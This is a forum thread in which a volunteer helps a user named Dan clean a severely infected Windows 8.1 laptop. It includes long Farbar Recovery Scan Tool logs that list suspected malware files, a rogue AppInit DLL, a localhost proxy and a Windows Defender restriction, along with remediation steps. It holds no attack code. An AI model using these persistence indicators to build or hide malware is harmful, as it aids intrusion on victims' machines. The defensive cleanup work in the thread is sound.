2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}
2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}
2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}
2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5
2018-05-29 20:36 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF
2018-05-28 23:34 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2018-05-27 22:13 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0
2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8
2018-05-16 00:00 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc

==================== Files in the root of some directories =======

2018-03-22 21:52 - 2018-05-31 20:37 - 000000004 _____ () C:\ProgramData\lock.dat
2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe
2017-03-29 19:14 - 2018-05-31 20:34 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part
2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS
2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part
2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-30 22:04 - 2018-05-30 22:04 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
C:\Windows\system32\drivers\cooeilos.sys -> Access Denied <======= ATTENTION

LastRegBack: 2018-05-29 22:18

==================== End of FRST.txt ============================

Edited by Oh My!, 02 June 2018 - 08:01 AM.


#8 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:08:03 AM

Posted 02 June 2018 - 04:25 PM

Hi Dan,

 

Your computer is severely infected. It will take me some additional time to research all the areas that are impacted.

 

Thank you for your patience.

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#9 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 03 June 2018 - 11:20 AM

Thanks , I'll patiently wait.

We'll get it fixed for sure , this forum has helped me out before.

 

Best ,

Dan



#10 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:08:03 AM

Posted 04 June 2018 - 04:12 PM

Hi Dan,

Thank you again for your patience. Since I'm still a trainee, all my posts have to be reviewed by my instructor, Gary, prior to being posted to make sure that you receive the best assistance possible.
 
IMPORTANT: One or more of the identified infections is a backdoor Trojan.

Backdoor Trojans, Botnets, and IRCBots are very dangerous because they compromise system integrity by making changes that allow it to be used by the attacker for malicious purposes. They can disable your anti-virus and security tools to prevent detection and removal. Remote attackers use backdoors as a means of accessing and taking control of a computer that bypasses security mechanisms. This type of exploit allows them to steal sensitive information like passwords, personal and financial data which is then sent back to the hacker. Read Danger: Remote Access Trojans.

You should disconnect the computer from the Internet and from any networked computers until it is cleaned. If your computer was used for online banking, paying bills, has credit card information or other sensitive data on it, all passwords should be changed immediately to include those used for taxes, email, eBay, PayPal and any other online activities. You should consider them to be compromised and change passwords from a clean computer, not the infected one. If not, an attacker may get the new passwords and transaction information. Banking and credit card institutions should be notified immediately of the possible security breach. Failure to notify your financial institution and local law enforcement can result in refusal to reimburse funds lost due to fraud or similar criminal activity. If using a router, you need to reset it with a strong logon/password before connecting again.

Although the infection has been identified and may be removed, your machine has likely been compromised and there is no way to be sure the computer can ever be trusted again. It is dangerous and incorrect to assume the computer is secure even if the malware appears to have been removed. In some instances an infection may have caused so much damage to your system that it cannot be successfully cleaned or repaired. The malware may leave so many remnants behind that security tools cannot find them. Many experts in the security community believe that once infected with this type of malware, the best course of action is to wipe the drive clean, reformat and reinstall the OS. Please read:

Whenever a system has been compromised by a backdoor payload, it is impossible to know if or how much the backdoor has been used to affect your system...There are only a few ways to return a compromised system to a confident security configuration. These include:

  • Reimaging the system
  • Restoring the entire system using a full system backup from before the backdoor infection
  • Reformatting and reinstalling the system

Backdoors and What They Mean to You

This is what Jesper M. Johansson, Security Program Manager at Microsoft TechNet has to say: Help: I Got Hacked. Now What Do I Do?.

The only way to clean a compromised system is to flatten and rebuild. Thats right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications).

 Please let me know whether you want to try to clean this PC or will reformat your hard drive and reset your router. Please also consider that Microsoft's end of mainstream support for Windows 8.1 was on January 9, 2018. Extended support ends on January 10, 2023. Windows 10 is faster and much more secure than Windows 8.1. Check Windows 10 Specifications & Systems Requirements to see whether your hardware will support Windows 10. Here's a brief excerpt:
 

Processor: 1 gigahertz (GHz) or faster processor or SoC
RAM: 1 gigabyte (GB) for 32-bit or 2 GB for 64-bit
Hard disk space: 16 GB for 32-bit OS 20 GB for 64-bit OS
Graphics card: DirectX 9 or later with WDDM 1.0 driver
Display: 800x600

Read the whole article for important notes.

 

Note that the retail price for Win10 Home is $119 and Win10 Pro is $199.

Assuming you want to fix this Machine
I am assuming you will want to fix this machine while it is still running Windows 8.1. In that case, I have prepared a script to be run using Farbar's Recovery Scan Tool (FRST). Before you run the tool, please uninstall FrostWire or agree to refrain from using it while we are working together. Then uninstall SearchAwesome (this is not optional). Follow that by running FRST to process the attached script. And, finally, please get me a new set of FRST logs. Use your thumb drive to transfer files between your clean PC and the sick laptop.

 

Preliminary question
Have you tried connecting to the internet via Ethernet cable to your router?


Peer-to-Peer File Sharing Warning

Going over your logs, I noticed that you have FrostWire installed.

  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and trojans spread across P2P file sharing networks, gaming, and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.

See quietman7's warning about P2P here.

It is pretty much certain that if you continue to use P2P programs, you will get re-infected.
I strongly recommend that you uninstall all peer-to-peer file sharing programs, however, that choice is up to you. To remove these programs, see Uninstall programs instructions below.

If you wish to keep it, please do not use it until your computer is cleaned.

Please let me know whether you will refrain from using FrostWire or will uninstall it.

Uninstall programs

  • Open Control Panel and find the list of installed programs displayed in the Programs and Features section.
  • Uninstall the following by right-clicking on the programs below (and any other similar names) and selecting Remove or Uninstall and clicking Yes for each program one at a time.

SearchAwesome

FrostWire

  • Take note of any error messages for each program to be uninstalled.
  • Reboot your laptop.

 

Run Farbar Recovery Scan Tool (FRST) in FIX mode

  • Download the attached Fixlist.txt file onto a thumb drive and transfer it to the desktop on the sick PC. Note: it must be placed into the same location as FRST64.exe which is already on your desktop.
  • Double-click FRST64.exe which is already on your desktop to open the Farbar Recovery Scan Tool window.
  • Click the Fix button in the Farbar Recovery Scan Tool window.
  • Wait until the program completes execution.
  • The tool will create a log called Fixlog.txt. Please post its contents into your reply.

NOTICE: This script was written specifically for this user to be used on this particular machine. Running this script on another machine may cause damage to your operating system.

 

Re-scan with Farbar Recovery Scan Tool

  • Right-click FRST64.exe then click Run as administrator.
  • When the tool opens, click Yes to disclaimer.
  • Under Optional Scan, be sure a checkmark is placed next to Addition.txt.
  • Click Scan.
  • When finished, it will produce logs called FRST.txt and Addition.txt in the same directory where the tool was run from.
  • Please copy and paste both logs into your next reply.

 

In your next reply...

  • Please confirm whether you want to fix Windows 8.1 rather than upgrade to Windows 10.
  • Did you uninstall FrostWire or are you agreeing to refrain from using it?
  • Did you try to connect to the router via Ethernet cable? Did you reach the internet that way?
  • Did you uninstall SearchAwesome?
  • Copy and paste the entire contents of Fixlog.txt into the body of your message. Copy directly from Notepad without double-spacing or doing any other alterations.
  • Copy and paste the entire contents of FRST.txt and Addition.txt into the body of your message. Copy directly from Notepad without double-spacing or doing any other alterations.
  • How is your laptop running now?

Thank you,

 

Ray

 

Note: The FRST script will be attached to my second of two consecutive posts.


Edited by RayS, 04 June 2018 - 04:26 PM.

I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#11 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:08:03 AM

Posted 04 June 2018 - 04:24 PM

Hi Dan,

 

Here's the FRST script attached.

 

 

Be sure you transfer this file (Fixlist.txt) onto the desktop of your sick laptop.

 

Thank you,

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#12 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 04 June 2018 - 06:25 PM

Hi Ray ,

This is Dan.

 

Ok , I'll get on it tonight.

There will be a 1 day delay for each reply because I'm using another computer to talk to you.

 

I stopped using Frostwire long time ago because it did'nt work for me

so I'll uninstall Frostwire and Searchawesome and follow your directions with scan and txt logs.

I know that SearchAwesome came on my computer the same date I believe when I got the virus

from what I remember seeing in program listings.

 

Best ,

Dan



#13 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 05 June 2018 - 11:23 AM

Hello Ray , 

Here is my reply to your questions and I'm also copy and pasting the Addition , Fixlog & Frst Text.

 

 

Please confirm whether you want to fix Windows 8.1 rather than upgrade to Windows 10.

 

Reply - I want to fix Windows 8.1

 

Did you uninstall FrostWire or are you agreeing to refrain from using it?

 

Reply - I uninstalled Frostwire but SearchAwesome could'nt uninstalled , evertime I right click uninstall it just does nothing and still on computer even after I reboot it. I use to have Revo-uninstall free trial program and that would work for sure on other stuff but I don;t have it no more , you'll have to supply a program or solution to get around this.

 

Did you try to connect to the router via Ethernet cable?

 

Reply - I always used it for W-FI on this laptop even though all the WiFi signals are running I still can't connect , the yellow sign (!) over the internet connection menue is still there and and still have blocked acess , I did try Ethernet cable connect and that don't work either , it's blocked.

 

Did you reach the internet that way?

 

Reply - No

 

Did you uninstall SearchAwesome?

 

Reply - Same answer , No , won't uninstall

 

Here's the Frst.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16.05.2018 01

Ran by Dan (administrator) on BEATLES (04-06-2018 21:04:52)

Running from C:\Users\Dan\Desktop

Loaded Profiles: Dan (Available Profiles: Dan)

Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: IE)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe

(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe

(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

() C:\ProgramData\dahhService\dahhService.exe

(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe

(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe

() C:\Program Files\Gramblr\gramblr.exe

(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe

(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe

() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe

() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe

(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe

(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe

(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

 

==================== Registry (Whitelisted) ===========================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()

HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)

HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)

HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]

ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

ProxyEnable: [.DEFAULT] => Proxy is enabled.

ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746

ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4

Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)

 

FireFox:

========

FF DefaultProfile: jefccanc.Daniel-1506042165545

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-05-29]

FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]

FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]

FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-05-29]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-05-29]

FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff

FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]

FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)

FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)

FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)

FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)

 

Chrome:

=======

CHR DefaultProfile: Default

CHR HomePage: Default -> search.mpc.am

CHR StartupUrls: Default -> "hxxps://www.google.com/"

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-05-29]

CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]

CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]

CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]

CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]

CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]

CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]

CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]

CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]

CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]

CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]

CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]

